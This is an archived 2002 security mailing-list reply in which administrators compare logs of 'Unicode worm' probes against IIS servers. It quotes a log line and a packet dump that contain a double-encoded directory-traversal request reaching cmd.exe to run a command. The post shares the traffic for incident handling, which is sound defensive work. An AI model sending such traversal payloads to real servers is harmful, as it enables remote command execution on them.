Re: Unicode worm?

From: John Sage (jsage@finchhaven.com)
Date: 08/22/02

Previous message: Turner, Keith (Contractor): "Unicode worm?"
In reply to:(deleted message) Soeren Ziehe: "Re: Unicode worm?"
Next in thread: Larsen, Colin: "RE: Unicode worm?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 21 Aug 2002 21:01:00 -0700
From: John Sage <jsage@finchhaven.com>
To: incidents@securityfocus.com

Soeren, Keith:

On Wed, Aug 21, 2002 at 07:43:00PM +0200, Soeren Ziehe wrote:
> In article <51F912F2A6CDD111810A00600811BA42024D8BE9@TEA05> [21 Aug 02]
> Turner, Keith (Contractor) <TurnerL@tea-emh1.army.mil> wrote:
>
> > [08-21-2002 - 00:56:11] Client at x.x.x.x: URL normalization was
> > not complete after one pass. Request will be rejected. Site
> > Instance='1', Raw URL='/scripts/..%255c%255c../winnt/system32/cmd.e
> > xe'
>
> I'm seeing the same requests.

I've recently seen several single-payload packet probes of the form:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/11-02:27:44.357277 216.181.16.2:4723 -> 12.82.129.71:80
TCP TTL:110 TOS:0x0 ID:26376 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0x36AEB784 Ack: 0x71FD0774 Win: 0x2238 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 5c%5c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
63 2B 64 69 72 0D 0A 69 72 0D 0A c+dir..ir..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

These have source IP's _not_ within my class B, or A; very quick,
typically six to nine packets for the total transaction, and they're gone.

- John

-- "You are in a little maze of twisty passages, all different."

PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html Fingerprint: C493 9F26 05A9 6497 9800 4EF6 5FC8 F23D 35A4 F705

---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

Previous message: Turner, Keith (Contractor): "Unicode worm?"
In reply to:(deleted message) Soeren Ziehe: "Re: Unicode worm?"
Next in thread: Larsen, Colin: "RE: Unicode worm?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: HAVE YOU EVER NOTICED
... More empty promises.... ... Gary Woods AKA K2AHC- PGP key on request, ...
(alt.support.diabetes)
Re: OK , WE AGREE YOU HATE ME
... All I'm seeing is a teenager spewing.... ... Gary Woods AKA K2AHC- PGP key on request, ...
(alt.support.diabetes)
Re: OT (very much so!)
... newer battery-powered quarts referenced posting. ... Gary Woods AKA K2AHC- PGP key on request, ...
(uk.rec.gardening)
Re: Whats an allotment?
... generally rules for upkeep. ... Gary Woods AKA K2AHC- PGP key on request, ...
(rec.gardens.edible)
Re: Running Silent
... He neglected to take a soil sample to his local ag agent. ... Gary Woods AKA K2AHC- PGP key on request, ...
(uk.rec.gardening)